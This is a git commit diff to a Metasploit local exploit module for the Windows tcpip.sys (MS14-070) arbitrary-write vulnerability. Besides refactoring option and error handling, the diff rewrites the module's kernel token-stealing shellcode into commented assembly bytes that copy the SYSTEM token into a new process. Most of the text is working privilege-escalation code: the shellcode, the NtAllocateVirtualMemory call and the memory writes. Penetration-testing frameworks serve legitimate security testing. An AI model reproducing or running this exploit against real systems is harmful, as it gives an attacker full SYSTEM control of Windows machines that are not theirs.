Addressed feedback from @OJ and @zeroSteiner

Jay Smith · Jay Smith · commit 6c529f8f6b79 · 2015-01-29T11:57:03.000-05:00
diff --git a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   def initialize(info={})
     super(update_info(info, {
-      'Name'          => 'Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation',
+      'Name'          => 'Windows tcpip.sys Arbitrary Write Privilege Escalation',
       'Description'    => %q{
         A vulnerability within Microsoft TCP/IP protocol driver, tcpip.sys, can allow an attacker
         to inject memory controlled by the attacker into an arbitrary location.
@@ -49,11 +49,6 @@ def initialize(info={})
       'DefaultTarget' => 0
     }))
 
-    register_options(
-      [
-        OptString.new('PID', [true, 'The target PID to elevate into', nil]),
-      ])
-
   end
 
   def check
@@ -62,9 +57,8 @@ def check
     end
 
     handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
-    if handle.nil?
-      return Exploit::CheckCode::Safe
-    end
+    return Exploit::CheckCode::Safe unless handle
+
     session.railgun.kernel32.CloseHandle(handle)
 
     file_path = get_env('WINDIR') << "\\system32\\drivers\\tcpip.sys"
@@ -113,9 +107,8 @@ def exploit
     p = payload.encoded
     new_pid = create_proc
 
-    if new_pid.nil?
-      print_warning('Unable to create a new process.')
-      return
+    unless new_pid
+      fail_with(Failure::Unknown, 'Unable to create a new process.')
     end
 
     print_status("Injecting #{p.length} bytes into #{new_pid} memory and executing it...")
@@ -133,25 +126,37 @@ def exploit
 
     session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE")
 
-    if not this_proc.memory.writable?(0x1000)
-      vprint_error("Failed to allocate memory")
-      return nil
-    else
-      vprint_good("0x1000 is now writable")
+    unless this_proc.memory.writable?(0x1000)
+      fail_with(Failure::Unknown, 'Failed to allocate memory')
     end
 
     buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
 
-    sc = "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04"
-    sc << "\x00\x00\x00\x8B\x80\x98\x00\x00\x00\x2D\x98"
-    sc << "\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x8B\xB8\xD8"
-    sc << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
+    sc = "\x60"                       # save registers
+    sc << "\x64\xA1\x24\x01\x00\x00"  # mov eax, [fs:0x124]
+    sc << "\x8B\x40\x38"              # mov eax, [eax+0x38]
+    sc << "\x50"                      # push eax
+    sc << "\xBB\x04\x00\x00\x00"      # mov ebx, 0x4
+    sc << "\x8B\x80\x98\x00\x00\x00"  # mov eax, [eax+0x98]
+    sc << "\x2D\x98\x00\x00\x00"      # sub eax, 0x98
+    sc << "\x39\x98\x94\x00\x00\x00"  # cmp [eax+0x94], ebx
+    sc << "\x75\xED"                  # jne 0x10
+    sc << "\x8B\xB8\xD8\x00\x00\x00"  # mov edi, [eax+0xd8]
+    sc << "\x83\xE7\xF8"              # and edi, 0xfffffff8
+    sc << "\x58"                      # pop eax
+    sc << "\xBB"                      # mov ebx, new_pid
     sc << [new_pid].pack('V')
-    sc << "\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94"
-    sc << "\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA"
-    sc << "\x39\xFF\xA2\xBA"
-    sc << "\xB9\x00\x00\x00\x00"
-    sc << "\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00"
+    sc << "\x8B\x80\x98\x00\x00\x00"  # mov eax, [eax+0x98]
+    sc << "\x2D\x98\x00\x00\x00"      # sub eax, 0x98
+    sc << "\x39\x98\x94\x00\x00\x00"  # cmp [eax+0x94], ebx
+    sc << "\x75\xED"                  # jne 0x32
+    sc << "\x89\xB8\xD8\x00\x00\x00"  # mov [eax+0xd8], edi
+    sc << "\x61"                      # restore registers
+    sc << "\xBA\x39\xFF\xA2\xBA"      # mov edx, 0xbaa2ff39
+    sc << "\xB9\x00\x00\x00\x00"      # mov ecx, 0x0
+    sc << "\xB8\x3B\x00\x00\x00"      # mov eax, 0x3b
+    sc << "\x8E\xE0"                  # mov fs, eax
+    sc << "\x0F\x35\x00"              # sysexit
 
     this_proc.memory.write(0x28, "\x87\xFF\xFF\x38")
     this_proc.memory.write(0x38, "\x00\x00")
@@ -167,10 +172,10 @@ def exploit
 
     unless is_system?
       fail_with(Failure::Unknown, "The exploitation wasn't successful")
-    else
-      print_good("Exploitation successful!")
     end
 
+    print_good("Exploitation successful!")
+
   end
 
 end
